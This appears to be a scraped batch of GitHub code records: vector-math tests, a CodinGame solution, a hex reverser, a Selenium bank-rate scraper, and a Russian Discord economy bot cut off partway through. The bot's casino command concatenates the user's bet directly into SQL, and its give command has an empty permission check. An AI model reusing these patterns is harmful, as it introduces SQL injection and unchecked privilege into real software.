u_c])\n\n\n@pytest.mark.parametrize(\"k\", [-1, 1, np.pi, -1, 1])\n@pytest.mark.parametrize(\"u_c\", test_vectors)\ndef test_vector_truediv(k, u_c):\n u = Vector(u_c)\n result = u / k\n assert result == Vector([i / k for i in u_c])\n\n\n@pytest.mark.parametrize(\"u_c\", test_vectors)\n@pytest.mark.parametrize(\"v_c\", test_vectors)\ndef test_vector_xor(u_c, v_c):\n u, v = Vector(u_c), Vector(v_c)\n result = u ^ v\n assert result == np.cross(u_c, v_c)\n\n\n@pytest.mark.parametrize(\"u_c\", test_vectors)\n@pytest.mark.parametrize(\"v_c\", test_vectors)\ndef test_vector_matmul(u_c, v_c):\n u, v = Vector(u_c), Vector(v_c)\n result = u @ v\n assert result == np.dot(u_c, v_c)\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_eq(vector_components):\n u, v = Vector(vector_components), Vector(vector_components)\n assert u == vector_components\n assert u == v\n assert (u == 2 * v) == False\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_is_parallel_to(vector_components):\n u = Vector(vector_components)\n v = 2 * Vector(vector_components)\n w = u - Vector.i()\n assert u.is_parallel_to(v) == True\n assert u.is_parallel_to(w) == False\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_is_orthogonal_to(vector_components):\n u = Vector(vector_components)\n v = u - Vector.i()\n projection = u.proj(v)\n projection_vector = projection * v.unit_vector\n w = u - projection_vector\n assert u.is_orthogonal_to(2 * u) == False\n assert w.is_orthogonal_to(v) == True\n\n\n@pytest.mark.parametrize(\"operation\", [lambda i: i**2, lambda i: 1 / i])\n@pytest.mark.parametrize(\"u_c\", [[1, 2, 3], [-np.pi, 1, np.e], [3 * 1j, -2j, 1j]])\ndef test_vector_element_wise(u_c, operation):\n u = Vector(u_c)\n vector = u.element_wise(operation)\n assert vector == Vector([operation(u[i]) for i in range(3)])\n\n\n@pytest.mark.parametrize(\"u_c\", test_vectors)\n@pytest.mark.parametrize(\"v_c\", test_vectors)\ndef test_vector_dot(u_c, v_c):\n u, v = Vector(u_c), Vector(v_c)\n result = u.dot(v)\n assert result == np.dot(u_c, v_c)\n\n\n@pytest.mark.parametrize(\"u_c\", test_vectors)\n@pytest.mark.parametrize(\"v_c\", test_vectors)\ndef test_vector_cross(u_c, v_c):\n u, v = Vector(u_c), Vector(v_c)\n result = u.cross(v)\n assert result == np.cross(u_c, v_c)\n\n\n@pytest.mark.parametrize(\"u_c\", test_vectors)\n@pytest.mark.parametrize(\"v_c\", test_vectors)\ndef test_vector_proj(u_c, v_c):\n u, v = Vector(u_c), Vector(v_c)\n projection = u.proj(v)\n projection_vector = projection * v.unit_vector\n assert v.is_orthogonal_to(u - projection_vector)\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_str(vector_components):\n vector = Vector(vector_components)\n assert eval(\"Vector(\" + str(vector) + \")\") == vector\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_repr(vector_components):\n vector = Vector(vector_components)\n assert eval(repr(vector).replace(\"(\", \"((\").replace(\")\", \"))\")) == vector\n\n\ndef test_vector_zeros():\n assert Vector.zeros() == [0, 0, 0]\n\n\ndef test_vector_i():\n assert Vector.i() == [1, 0, 0]\n\n\ndef test_vector_j():\n assert Vector.j() == [0, 1, 0]\n\n\ndef test_vector_k():\n assert Vector.k() == [0, 0, 1]\n","repo_name":"RocketPy-Team/RocketPy","sub_path":"tests/test_tools_vector.py","file_name":"test_tools_vector.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","stars":468,"dataset":"github-code","pt":"31"} +{"seq_id":"10977672700","text":"import sys\n# the standard input according to the problem statement.\n\nn = int(input())\nword_list = [input() for _ in range(n)]\nprint(word_list, file=sys.stderr, flush=True)\n\n\n# 输入原始序列和子序列,返回原始序列\ndef get_next_sequence(sequence, wordB):\n length_list = []\n if wordB in sequence:\n sequence.remove(wordB)\n for index, wordA in enumerate(sequence):\n if wordA == wordB:\n continue\n if wordB in wordA:\n length_list.append((0, wordA, index))\n continue\n if wordA in wordB:\n length_list.append((0, wordB, index))\n continue\n loc = 0\n start_length = 9999\n char = wordB[0]\n if char in wordA:\n for _ in range(wordA.count(char)):\n loc = wordA.find(char, loc + 1)\n if wordB.startswith(wordA[loc:]):\n start_length = len(wordB) - (len(wordA) - loc)\n start_new_word = wordA + wordB[len(wordA) - loc:]\n length_list.append((start_length, start_new_word, index))\n break\n loc = 9999\n end_length = 9999\n char = wordB[-1]\n if char in wordA:\n for _ in range(wordA.count(char)):\n loc = wordA.rfind(char, 0, loc - 1)\n if wordB.endswith(wordA[:loc + 1]):\n end_length = len(wordB) - loc - 1\n end_new_word = wordB[:-loc-1] + wordA\n length_list.append((end_length, end_new_word, index))\n break\n if length_list:\n print(\"length_list\", length_list, file=sys.stderr, flush=True)\n min_length = min(length_list)\n print(\"min_length\", min_length, file=sys.stderr, flush=True)\n sequence[min_length[2]] = min_length[1]\n print(\"sequence\", sequence, file=sys.stderr, flush=True)\n else:\n if wordB not in sequence:\n sequence.append(wordB)\n\n\nsequence = []\nout = 0\nfor word in word_list:\n get_next_sequence(sequence, word)\nfor word in sequence:\n get_next_sequence(sequence, word)\n\nprint(sum(len(word) for word in sequence))","repo_name":"Tianorder/CodinGame","sub_path":"puzzles/hard/genome-sequencing/genome-sequencing.py","file_name":"genome-sequencing.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73566717527","text":"# Made with <3 by systemdev on GBATemp\n\ndef reverse_hex_string(in_string):\n out_hex_array = []\n for i in range(0, int(len(in_string) / 2)):\n out_hex_array.append(in_string[i * 2] + in_string[(i * 2) + 1])\n out_hex_string = \"\".join(out_hex_array[::-1])\n return out_hex_string\n\ndef collect_and_print_reversed_hex_strings():\n reversed_hex_strings = []\n while True:\n inHexString = input(\"Enter your hex string (Leave the 0x out), or type 'pause' to print hex strings, or 'exit' to close: \")\n\n if inHexString.lower() == 'exit':\n break\n elif inHexString.lower() == 'pause':\n print(\"\\nReversed Hex Strings:\")\n for reversed_hex in reversed_hex_strings:\n print(reversed_hex)\n input(\"\\nPress Enter to continue...\")\n else:\n outHexString = reverse_hex_string(inHexString)\n reversed_hex_strings.append(outHexString)\n\n print(\"Exiting the script...\")\n\nif __name__ == \"__main__\":\n collect_and_print_reversed_hex_strings()","repo_name":"StevensND/ghidra-port-mods-guide","sub_path":"Python Scripts/hexreverser.py","file_name":"hexreverser.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"73119787288","text":"from selenium import webdriver\r\nfrom time import sleep\r\nfrom bs4 import BeautifulSoup as bs\r\nimport pandas as pd\r\nimport datetime\r\nimport warnings\r\nimport numpy as np\r\nfrom maks_lib import output_path\r\nwarnings.simplefilter(action='ignore')\r\n\r\nnow = datetime.datetime.now()\r\n\r\nclass App:\r\n\r\n def __init__(self, url = 'https://www.synchronybank.com/banking/high-yield-savings/ '):\r\n self.driver = webdriver.Firefox()\r\n self.driver.get(url)\r\n sleep(5)\r\n self.data_page()\r\n\r\n\r\n\r\n def data_page(self):\r\n html = self.driver.execute_script(\"return document.documentElement.outerHTML\")\r\n soup = bs(html, 'html.parser')\r\n li = soup.find_all('li')\r\n min_open = li[29].getText()\r\n Pd = soup.find_all('h2', attrs={'class':'heading-level-1'})\r\n Pd = Pd[1].getText()\r\n li = soup.find_all('span',attrs={'id':['mmaLowApy','mmaMidApy','mmaHighApy']})\r\n Apy_li=[]\r\n for apy in li:\r\n if apy.getText() is not None:\r\n Apy_li.append(apy.getText().rstrip(\"APY*\"))\r\n\r\n bal = soup.find_all('div', attrs={'class':'deposit-range'})\r\n bal_li = []\r\n for brange in bal:\r\n if brange.getText() is not None:\r\n bal_li.append(brange.getText())\r\n # print(li[32].getText())\r\n # print(li[33].getText())\r\n return Apy_li, Pd, bal_li, min_open\r\n\r\n def browser_close(self):\r\n self.driver.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n app = App()\r\n Apy_li, Pd, bal_li, min_open = app.data_page()\r\n app.browser_close()\r\n df = pd.DataFrame({'Date':now.strftime(\"%m/%d/%Y\"),\"Bank Name\":'Synchrony','Product Name':Pd,\r\n \"Minimum Open Balance\":min_open,\"Deposite\":bal_li,\"APY\":Apy_li})\r\n df = df.reindex(\r\n columns=[\"Date\", \"Bank Name\", \"Product Name\", \"Minimum Open Balance\",\"Deposite\", \"APY\"])\r\n df.to_csv(output_path +\"Sync_Data_Deposit_High_Yield.csv\".format(now.strftime(\"%m_%d_%Y\")), index=False)\r\n\r\n df1 = pd.read_csv(output_path+\"Sync_Data_Deposit.csv\")\r\n df2 = pd.read_csv(output_path+\"Sync_Data_Make_Money.csv\")\r\n df3 = pd.read_csv(output_path+\"Sync_Data_Deposit_High_Yield.csv\")\r\n df3 = pd.concat([df1, df2, df3])\r\n#####################################################################################################################\r\n df3[\"Date\"] = now.strftime(\"%m-%d-%Y\")\r\n df3[\"Bank_Name\"]=\"SYNCHRONY\"\r\n df3[\"Bank_Product\"]= \"Deposits\"\r\n df3[\"Bank_Product_Type\"] = df3[\"Product Name\"].str.strip(\"_3 _6 _9 _12 _18 _24 _36 _48 _60 -month Money Market Rates and Terms HYS Rates and Terms\")\r\n df3[\"Bank_Offer_Feature\"] = \"Online\"\r\n df3[\"Bank_Product_Name\"] = df3[\"Product Name\"]\r\n df3[\"Product_Term\"] = df3[\"Product Name\"].str.strip(\"CD_ -month Money Market Rates and Terms HYS Rates and Terms\")\r\n df3[\"Balance\"] = df3[\"Deposite\"]\r\n df3[\"Product_Interest\"] = np.NAN\r\n df3[\"Product_Apy\"] = df3[\"APY\"]\r\n df3[\"Mortgage_Down_Payment\"] = np.NAN\r\n df3[\"Mortgage_Loan\"] = np.NAN\r\n df3[\"Min_Credit_Score_Mortagage\"] = np.NAN\r\n df3[\"Mortgage_Apr\"] = np.NAN\r\n df3 = df3.reindex(columns=[\"Date\", \"Bank_Name\",\"Bank_Product\", \"Bank_Product_Type\", \"Bank_Offer_Feature\", \"Bank_Product_Name\", \"Product_Term\", \"Balance\",\"Product_Interest\",\"Product_Apy\",\"Mortgage_Down_Payment\",\"Mortgage_Loan\",\"Min_Credit_Score_Mortagage\", \"Mortgage_Apr\"])\r\n df3.loc[9:15]['Bank_Product_Type']='Savings'\r\n df3.to_csv(output_path +\"Consolidate_Sync_Data_Deposit{}.csv\".format(now.strftime(\"%m_%d_%Y\")), index=False)\r\n","repo_name":"pool23/pool","sub_path":"scripts/synchrony_high_yield.py","file_name":"synchrony_high_yield.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19331064367","text":"import discord\r\nfrom discord.ext import commands\r\nimport time\r\nfrom asyncio import sleep\r\nimport random\r\nimport json\r\nimport sqlite3\r\nfrom discord.ext import tasks\r\nimport traceback\r\nimport datetime\r\nclient = commands.Bot(command_prefix = \".\",intents = discord.Intents.all())\r\nclient.remove_command(\"help\")\r\nconnection = sqlite3.connect('iponergoodestman.iponer')\r\ncursor = connection.cursor()\r\n@client.event\r\nasync def on_ready():\r\n print('Bot is ready')\r\n print('Users: ' + str(len(client.users)))\r\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS users (\r\n name TEXT,\r\n id INT,\r\n server_id INT,\r\n cash BIGINT CHECK (cash >= 0),\r\n voice BIGINT,\r\n lvl BIGINT,\r\n messages BIGINT,\r\n warn BIGINT\r\n )\"\"\")\r\n\r\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS shop (\r\n role_id INT,\r\n id INT,\r\n cost BIGINT\r\n )\"\"\")\r\n\r\n\r\n for guild in client.guilds:\r\n for member in guild.members:\r\n if cursor.execute(F\"SELECT id FROM users WHERE id = {member.id}\").fetchone() is None:\r\n cursor.execute(\"INSERT INTO users VALUES (?,?,?,0,0,0,0,0)\", (member.name, member.id, member.guild.id))\r\n connection.commit() #bd\r\n else:\r\n pass\r\n connection.commit()\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n if cursor.execute(F\"SELECT id FROM users WHERE id = {member.id}\").fetchone() is None:\r\n cursor.execute(\"INSERT INTO users VALUES (? ,?, ?,0,0,0,0,0)\", (member.name,member.id, member.guild.id))\r\n connection.commit() #bd\r\n else:\r\n pass\r\n channel = client.get_channel(728693828701388803)\r\n embed = discord.Embed(\r\n colour=discord.Colour.from_rgb(47, 49, 54),\r\n title=\"Добро пожаловать\",\r\n description=\"Приветитсвую вас на нашем сервере!Не забывай смотреть правила\"\r\n )\r\n await channel.send(f\"{member.mention}\",embed=embed)\r\n\r\n\r\n\r\n\r\n@client.command()\r\nasync def buy(ctx,role: discord.Role=None):\r\n if role is None:\r\n await ctx.send(\"{ctx.author} укажите роль,которую хотите купить\")\r\n else:\r\n if role in ctx.author.roles:\r\n await ctx.send(f\"**{ctx.author}**,у вас имеется данная роль\")\r\n elif cursor.execute(\"SELECT cost FROM shop WHERE role_id = {}\".format(role.id)).fetchone()[0] > cursor.execute(\"SELECT cash FROM users WHERE id = {}\".format(ctx.author.id)).fetchone()[0]:\r\n await ctx.send(f\"**{ctx.author},У вас недостаточно средств для покупки этой роли!**\")\r\n else:\r\n await ctx.author.add_role(role)\r\n cursor.execute(\"UPDATE users SET cash = cash - {0} WHERE id = {1}\".format(cursor.execute(\"SELECT cost FROM shop WHERE role_id = {}\".format(role.id)).fetchone()[0],ctx.author.id))\r\n await ctx.send(f\"**{ctx.author.id}**,Роль успешна куплена\")\r\n\r\n\r\n@client.command()\r\nasync def add_shop(ctx, role: discord.Role=None,cost : int=None):\r\n if role is None:\r\n await ctx.send(f\"**{ctx.author},укажите роль,которые вы желаете внести в магазин**\")\r\n else:\r\n if cost is None:\r\n await ctx.send(f\"**{ctx.author}** укажите стоимость данной роли\")\r\n elif cost < 0:\r\n await ctx.send(f\"**{ctx.author}, стоимость роли не может быть такой маленькой**\")\r\n else:\r\n await ctx.send(\"Роль успешно добавлена\")\r\n cursor.execute(\"INSERT INTO shop VALUES ({},{},{})\".format(role.id, ctx.guild.id, cost))\r\n connection.commit()\r\n\r\n\r\n\r\n\r\n\r\n@client.command()\r\nasync def remove_shop(ctx,role:discord.Role=None):\r\n if role is None:\r\n await ctx.send(f\"{ctx.author},укажите роль,которую вы хотите удалить из магазина\")\r\n else:\r\n cursor.execute(\"DELETE FROM shop WHERE role_id = {}\".format(role.id))\r\n connection.commit()\r\n\r\n await ctx.send(\"Роль успешна удалена из магазина\")\r\n\r\n@client.command()\r\nasync def shoprole(ctx):\r\n embed = discord.Embed(title= 'Магазин ролей')\r\n\r\n for row in cursor.execute(\"SELECT role_id, cost FROM shop WHERE id = {}\".format(ctx.guild.id)):\r\n if ctx.guild.get_role(row[0]) != None:\r\n embed = discord.Embed(\r\n title = 'Shop',\r\n colour = discord.Colour.from_rgb(153, 204, 255)\r\n )\r\n embed.add_field(\r\n name = f\"Стоимость **{row[1]}**\",\r\n value = f\"Вы приобретаете роль {ctx.guild.get_role(row[0]).mention}\"\r\n )\r\n\r\n await ctx.send(embed=embed)\r\n else:\r\n pass\r\n\r\n\r\n\r\n@client.command()\r\nasync def delite(ctx):\r\n cursor.execute(\"UPDATE users SET voice = 0\")\r\n connection.commit()\r\n await ctx.send(\"Успешно\")\r\n\r\n@client.event\r\nasync def on_voice_state_update(member, before, after):\r\n global current_date_time\r\n if before.channel is None and after.channel is not None:\r\n current_date_time = datetime.datetime.now()\r\n if before.channel and not after.channel:\r\n current_time = current_date_time.now()\r\n fultime = current_time - current_date_time\r\n fultime = fultime.total_seconds()\r\n sec = round(fultime)\r\n sec_value = sec % (24 * 3600)\r\n hour_value = sec_value // 3600\r\n sec_value %= 3600\r\n min_value = sec_value // 60\r\n sec_value %= 60\r\n #await member.guild.system_channel.send(f\"\"\"{round(hour_value)} часов,{round(min_value)}минут, {round(sec_value)} секунд\"\"\")\r\n cursor.execute(\"UPDATE users SET voice = voice + ? WHERE id = ?\", (sec, member.id,))\r\n connection.commit()\r\n@client.command()\r\nasync def profile(ctx):\r\n messageprint = cursor.execute(\"SELECT messages FROM users WHERE id = ?\", (ctx.author.id,)).fetchone()[0]\r\n voiceprint = cursor.execute(\"SELECT voice FROM users WHERE id = ?\", (ctx.author.id,)).fetchone()[0]\r\n warnprint = cursor.execute(\"SELECT warn FROM users WHERE id = ?\", (ctx.author.id,)).fetchone()[0]\r\n lvlprint = cursor.execute(\"SELECT lvl FROM users WHERE id = ?\", (ctx.author.id,)).fetchone()[0]\r\n economyprint = cursor.execute(\"SELECT cash FROM users WHERE id = ?\", (ctx.author.id,)).fetchone()[0]\r\n sec = voiceprint\r\n sec_value = sec % (24 * 3600)\r\n hour_value = sec_value // 3600\r\n sec_value %= 3600\r\n min_value = sec_value // 60\r\n sec_value %= 60\r\n embed = discord.Embed(\r\n colour=discord.Colour.from_rgb(47, 49, 54),\r\n title=\"Профиль\",\r\n description=\"Мой прекрасный профиль...\"\r\n )\r\n embed.add_field(name=\"Валюта\", value=f\"**{economyprint}** :crown:\", inline=False)\r\n embed.add_field(name=\"Всего соабщений\",value=f\"**{messageprint}**\",inline=True)\r\n #embed.add_field(name=\"Уровни\", value=f\"**{lvlprint}**\", inline=True)\r\n embed.add_field(name=\"Варны\", value=f\"**{warnprint}**\", inline=True)\r\n embed.add_field(name=\"Голосовой актив\", value=f\"**{round(hour_value)}** часов ,**{round(min_value)}** минут, **{round(sec_value)}** секунд\", inline=False)\r\n await ctx.send(embed=embed)\r\n@client.command()\r\nasync def casino(ctx,moneys=None,member: discord.Member = None):\r\n b = ['1','2']\r\n a = random.choice(b)\r\n if moneys is None:\r\n await ctx.send(\"Укажите сумму ставки\")\r\n if a == \"1\":\r\n try:\r\n cursor.execute(\"UPDATE users SET cash = cash -\" + str(moneys) + \" WHERE id = {}\".format(ctx.author.id))\r\n moneys = int(moneys)\r\n connection.commit()\r\n await ctx.send(f\"\"\"\r\n Вы проиграли: {moneys} :crown:\r\nВаш баланс: **{ctx.author}** составляет **{cursor.execute(\"SELECT cash FROM users WHERE id = {}\".format(ctx.author.id)).fetchone()[0]} ** :crown:\r\n \"\"\")\r\n except:\r\n await ctx.send(f\"{ctx.author},у вас нехватает денег\")\r\n if a == \"2\":\r\n try:\r\n cursor.execute(\"UPDATE users SET cash = cash -\" + str(moneys) + \" WHERE id = {}\".format(ctx.author.id))\r\n moneys = int(moneys) * 2\r\n cursor.execute(\"UPDATE users SET cash = cash +\" + str(moneys) +\" WHERE id = {}\".format(ctx.author.id))\r\n connection.commit()\r\n await ctx.send(f\"\"\"\r\n Вы выйграли: {moneys} :crown:\r\nВаш баланс: **{ctx.author}** составляет **{cursor.execute(\"SELECT cash FROM users WHERE id = {}\".format(ctx.author.id)).fetchone()[0]} ** :crown:\r\n \"\"\")\r\n except:\r\n await ctx.send(f\"{ctx.author},у вас нехватает денег\")\r\n@client.command()\r\n@commands.cooldown(1, 86400, commands.BucketType.user)\r\nasync def daily(ctx):\r\n cursor.execute(\"UPDATE users SET cash = cash + ? WHERE id = ?\", (50, ctx.author.id,))\r\n connection.commit()\r\n await ctx.send(f\"{ctx.author},Вы получили 50 монет\")\r\n@client.command()\r\n@commands.has_guild_permissions()\r\nasync def give(ctx,members:discord.Member=None,moneysa=None):\r\n cursor.execute(\"UPDATE users SET cash = cash + ? WHERE id = ?\", (moneysa, members.id,))\r\n connection.commit()\r\n await ctx.send(f\"успешно.\")\r\n@client.command()\r\nasync def leaderboardvoice(ctx):\r\n embed = discord.Embed(title='топ 10 сервера по часам войса')\r\n counter = 0\r\n for row in cursor.execute(\"SELECT name, voice From users WHERE server_id = {} ORDER BY cash DESC LIMIT 10\".format(ctx.guild.id)):\r\n counter += 1\r\n embed.add_field(name=F'# {counter} | {row[0]} ', value=F'Баланс: {row[1]}', inline=False)\r\n await ctx.send(embed=embed)\r\n@client.command()\r\nasync def leaderboardeconomy(ctx):\r\n embed = discord.Embed(title='топ 10 сервера по валюте')\r\n counter = 0\r\n for row in cursor.execute(\"SELECT name, cash From users WHERE server_id = {} ORDER BY cash DESC LIMIT 10\".format(ctx.guild.id)):\r\n counter += 1\r\n embed.add_field(name=F'# {counter} | {row[0]} ', value=F'Баланс: {row[1]}', inline=False)\r\n await ctx.send(embed=embed)\r\n@client.command()\r\nasync def balance(ctx, members: discord.Member = None):\r\n if members is None:\r\n embed = discord.Embed(\r\n title = f\"{ctx.author}\",\r\n colour=discord.Colour.from_rgb(47, 49, 54),\r\n )\r\n embed.add_field(name=f\"\"\"Баланс пользователя составляет {cursor.execute(\"SELECT cash FROM users WHERE id = ?\", (ctx.author.id,)).fetchone()[0]} :candy: \"\"\",value=f\"_ _\",inline=False)\r\n await ctx.send(embed=embed)\r\n else:\r\n embed = discord.Embed(\r\n title = f\"{members}\",\r\n colour=discord.Colour.from_rgb(47, 49, 54),\r\n )\r\n embed.add_field(name=f\"\"\"Баланс пользователя составляет {cursor.execute(\"SELECT cash FROM users WHERE id = ?\", (members.id,)).fetchone()[0]} :candy: \"\"\",value=f\"_ _\", inline=False)\r\n await ctx.send(embed=embed)\r\n@client.event\r\nasync def on_message(message):\r\n await client.process_commands(message)\r\n cursor.execute(\"UPDATE users SET messages = messages + ? WHERE id = ?\", (1, message.author.id,))\r\n connection.commit()\r\n@client.command()\r\nasync def send(ctx,gif=\"nos\",*,slova=None):\r\n if not ctx.message.author.guild_permissions.administrator:\r\n await ctx.send('У вас не хватает прав!')\r\n if ctx.message.author.guild_permissions.administrator:\r\n if slova is None:\r\n await ctx.send(f\"{ctx.author},Вы не указали слова для отправления\")\r\n else:\r\n await ctx.message.delete()\r\n embed = discord.Embed(\r\n colour=discord.Colour.from_rgb(47, 49, 54),\r\n description=slova\r\n )\r\n if gif == \"no\":\r\n await ctx.send(embed=embed)\r\n if not gif == \"no\":\r\n embed.set_image(url=gif)\r\n await ctx.send(embed=embed)\r\n@client.listen(\"on_command_error\")\r\nasync def cooldown_message(ctx, error):\r\n if isinstance(error, commands.CommandOnCooldown):\r\n embed = discord.Embed(\r\n title = 'Cooldown:',\r\n colour = discord.Colour.from_rgb(255, 20, 20)\r\n )\r\n embed.add_field(name=\"Error\", value=f\"комманду {ctx.command.qualified_name} можно использовать только {error.cooldown.rate} раз в {error.cooldown.per} секунд. Попробуйте через {error.retry_after:.0f} секунд.\", inline=False)\r\n await ctx.send(embed=embed)\r\n else:\r\n raise error\r\n\r\n@client.command()\r\nasync def help(ctx):\r\n embed = discord.Embed(\r\n colour=discord.Colour.from_rgb(47, 49, 54),\r\n title=f\"{ctx.author} Мой список комманд\",\r\n description=\"Некоторые комманды работают только для администрации\"\r\n )\r\n embed.add_field(name=\"сasino {ставка}\",value=\"<:1382_dot:852864880243245097> Ставка валюты вы можете проиграть или выйграть.\",inline=False)\r\n embed.add_field(name=\"balance {участник}\",value=\"<:1382_dot:852864880243245097> Узнать свой баланс или игрока.\",inline=False)\r\n embed.add_field(name=\"daily\", value=\"<:1382_dot:852864880243245097> Вы можете каждый день получать 50 монет.\", inline=False)\r\n embed.add_field(name=\"profile\", value=\"<:1382_dot:852864880243245097> Посмотреть свой профиль.\",inline=False)\r\n embed.add_field(name=\"give {участник}\", value=\"<:1382_dot:852864880243245097> Выдать человеку баланс.Ps тока для администрации.\",inline=False)\r\n embed.add_field(name=\"leaderboardeconomy\", value=\"<:1382_dot:852864880243245097> Посмотреть топ по экономике.\", inline=False)\r\n embed.add_field(name=\"leaderboardvoice\", value=\"<:1382_dot:852864880243245097> Посмотреть топ по часам в войсе.\",inline=False)\r\n await ctx.send(embed=embed)\r\n\r\n\r\n@client.command(aleases=[\"пощёчина\"])\r\nasync def пощёчина(ctx, member: discord.Member = None):\r\n embed = discord.Embed(\r\n title='Реакции',\r\n colour=discord.Colour.from_rgb(153, 204, 255),\r\n description=f\"{ctx.author.mention} дает пощечину {member.mention}\"\r\n )\r\n url = ['https://media1.tenor.com/images/299366efafc95bc46bfd2f9c9a46541a/tenor.gif?itemid=16819981',\r\n 'https://i.pinimg.com/originals/68/de/67/68de679cc20000570e8a7d9ed9218cd3.gif',\r\n 'https://thumbs.gfycat.com/BabyishBeneficialDoe-size_restricted.gif',\r\n 'https://i.pinimg.com/originals/c6/00/12/c60012a00fd5257d71d734f57910bf33.gif']\r\n url = (random.choice(url))\r\n embed.set_image(url=url)\r\n\r\n await ctx.send(embed=embed)\r\n\r\n\r\n@client.command()\r\nasync def дать(ctx,xuy=None,member: discord.Member = None):\r\n if xuy == \"пять\":\r\n if member == ctx.author:\r\n await ctx.send(\"Вы не можете сделать реакцию с самим собой\")\r\n else:\r\n embed = discord.Embed(\r\n title='Реакции',\r\n colour=discord.Colour.from_rgb(153, 204, 255),\r\n description=f\"{ctx.author.mention} дает пять {member.mention}\"\r\n )\r\n url = [\r\n 'http://pa1.narvii.com/6384/7bc7fa9e1776f1d9c37f694179bdda1863ac6073_00.gif',\r\n 'http://pa1.narvii.com/5966/80277115ddededfe4fb0b8e274ed0c52db0c0949_hq.gif',\r\n 'https://thumbs.gfycat.com/ActualWarmheartedDungbeetle-size_restricted.gif',\r\n 'https://pa1.narvii.com/6400/0c90019e56cf232a9cc4a73ee368ffbb101b6a3f_hq.gif'\r\n ]\r\n url = (random.choice(url))\r\n embed.set_image(url=url)\r\n await ctx.send(embed=embed)\r\n@client.command()\r\nasync def укусить(ctx,member: discord.Member = None):\r\n if member == ctx.author:\r\n await ctx.send(\"Вы не можете сделать реакцию с самим собой\")\r\n else:\r\n embed = discord.Embed(\r\n title='Реакции',\r\n colour=discord.Colour.from_rgb(153, 204, 255),\r\n description = f\"{ctx.author.mention} лижет {member.mention}\"\r\n )\r\n url = [\r\n 'https://pa1.narvii.com/6687/26eaef4b158aab82e6a4c4ba91693da496372016_hq.gif',\r\n 'https://pa1.narvii.com/6780/2c9688d787905d0006c256ed8f94249fbfb2d95c_hq.gif',\r\n 'https://i.pinimg.com/originals/e8/f0/40/e8f04097f001ed4a45dba2ebbbe6bbc0.gif'\r\n ]\r\n url = (random.choice(url))\r\n embed.set_image(url=url)\r\n await ctx.send(embed=embed)\r\n\r\n@client.command(aleases=[\"обнять\"])\r\nasync def обнять(ctx, member: discord.Member = None):\r\n if member == ctx.author:\r\n await ctx.send(\"Вы не можете сделать реакцию с самим собой\")\r\n else:\r\n embed = discord.Embed(\r\n title='Реакции',\r\n colour=discord.Colour.from_rgb(153, 204, 255),\r\n description=f\"{ctx.author.mention} обнимает {member.mention}\"\r\n )\r\n url = ['https://acegif.com/wp-content/gif/anime-hug-12.gif',\r\n 'https://giffiles.alphacoders.com/201/201915.gif',\r\n 'https://i.pinimg.com/originals/9e/37/86/9e378638db8cc4d64f54e8bb9e924c3e.gif',\r\n 'https://pa1.narvii.com/6765/b082a857da92e16def6d429fcbfc2cd529799201_hq.gif',\r\n 'https://data.whicdn.com/images/233559365/original.gif',\r\n 'https://pa1.narvii.com/6765/b082a857da92e16def6d429fcbfc2cd529799201_hq.gif',\r\n 'https://pa1.narvii.com/6503/4d18935416c0aff9141b5d712c91f415d3f37a8b_hq.gif',\r\n 'https://data.whicdn.com/images/218924967/original.gif',\r\n 'https://data.whicdn.com/images/98781828/original.gif',\r\n 'https://i.pinimg.com/originals/32/89/d8/3289d80dcec9c95a0b895a479b90e88c.gif', # 10\r\n 'https://acegif.com/wp-content/gif/anime-hug-1.gif',\r\n 'https://www.anime-graffiti.com/wp-content/uploads/img/201504/20150427-k102.gif',\r\n 'https://pa1.narvii.com/6998/4f34261cb5c67c599cce8166e5396507c7a3cd5dr1-540-304_hq.gif',\r\n 'https://otvet.imgsmail.ru/download/d12cee7ab1dae323435d4dae35178907_i-913.gif',\r\n 'https://acegif.com/wp-content/gif/anime-hug-49.gif',\r\n 'https://i.pinimg.com/originals/cb/4d/69/cb4d691799c3cb2b2e7be0e13b2ac183.gif',\r\n 'https://i.pinimg.com/originals/ea/e1/54/eae154c1c30cc252035e5648f29bf2a1.gif',\r\n 'https://giffiles.alphacoders.com/757/75748.gif',\r\n 'https://data.whicdn.com/images/87333686/original.gif',\r\n 'https://data.whicdn.com/images/236902451/original.gif', # 20\r\n 'https://im0-tub-ru.yandex.net/i?id=4f6638de4165f0d92aab023ababd43ef&n=13',\r\n 'https://i.pinimg.com/originals/64/c4/6e/64c46e7b7e45748c2e0d2bb992961299.gif',\r\n 'https://i.pinimg.com/originals/5b/83/7c/5b837c1c170d8bf77d11cbdca09eb8eb.gif',\r\n 'https://pa1.narvii.com/6765/b082a857da92e16def6d429fcbfc2cd529799201_hq.gif',\r\n 'https://i.pinimg.com/originals/6b/4b/b8/6b4bb8820a05a841d3317172b7b0224f.gif'] # 25\r\n url = (random.choice(url))\r\n embed.set_image(url=url)\r\n\r\n await ctx.send(embed=embed)\r\n\r\n\r\n@client.command(aleases=[\"поцелуй\", \"целовать\", \"поцел��вать\"])\r\nasync def поцеловать(ctx, member: discord.Member = None):\r\n if member == ctx.author:\r\n await ctx.send(\"Вы не можете сделать реакцию с самим собой\")\r\n else:\r\n embed = discord.Embed(\r\n title='Реакции',\r\n colour=discord.Colour.from_rgb(153, 204, 255),\r\n description=f\"{ctx.author.mention} целует {member.mention}\"\r\n )\r\n url = ['https://i.pinimg.com/originals/78/10/a0/7810a059eb4b9431b9bb7633f3454338.gif',\r\n 'https://i.imgur.com/So3TIVK.gif',\r\n 'https://animesher.com/orig/0/79/793/7930/animesher.com_boy-feels-shoujo-793037.gif',\r\n 